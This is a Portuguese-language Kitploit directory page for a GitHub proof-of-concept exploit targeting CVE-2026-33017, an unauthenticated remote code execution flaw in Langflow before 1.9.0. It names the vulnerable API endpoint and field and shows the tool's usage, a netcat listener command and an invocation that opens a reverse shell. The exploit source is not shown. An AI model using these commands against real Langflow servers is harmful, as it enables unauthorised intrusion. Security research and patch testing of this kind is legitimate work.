Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33017-Langflow-RCE — CVE-2026-33017 Exploit | por infrar3d | Kitploit
Ferramentas/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce

CVE-2026-33017-Langflow-RCE

CVE-2026-33017 Exploit | por infrar3d

Ver Repositório
111há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-33017 - Vulnerabilidade de RCE no Langflow

explorado por infrar3d

Esta prova de conceito explora uma vulnerabilidade crítica de Execução Remota de Comandos (RCE) no Langflow em versões anteriores à 1.9.0. A vulnerabilidade permite que atacantes não autenticados executem comandos arbitrários no sistema ao injetar código Python malicioso através do endpoint da API de construção de fluxos. A vulnerabilidade existe no endpoint /api/v1/build_public_tmp/{flow_id}/flow, que não sanitiza adequadamente o código fornecido pelo usuário no campo code dos templates de componentes.

Uso:

root@kitploit:~
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]

Langflow RCE Exploit

options:
  -h, --help       show this help message and exit
  -u, --url URL    Target base URL
  -f, --flow FLOW  Flow ID
  -H, --host HOST  Listener host for reverse shell
  -P, --port PORT  Listener port (default: 4444)
                                         

Exemplo:

O primeiro terminal (ouvinte):

root@kitploit:~
nc -lvnp 4444

O segundo terminal (exploit):

root@kitploit:~
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444 

⚠️ Aviso Legal ⚠️

Este software e código de prova de conceito são fornecidos apenas para fins educacionais e de pesquisa.

  • Os autores não se responsabilizam por qualquer uso indevido ou dano causado por este programa.
  • Não utilize contra qualquer sistema sem autorização prévia explícita.
  • O uso destas ferramentas para atacar alvos sem consentimento é ilegal.

Você é responsável por cumprir todas as leis aplicáveis. Use com ética e responsabilidade.

Baixar ferramenta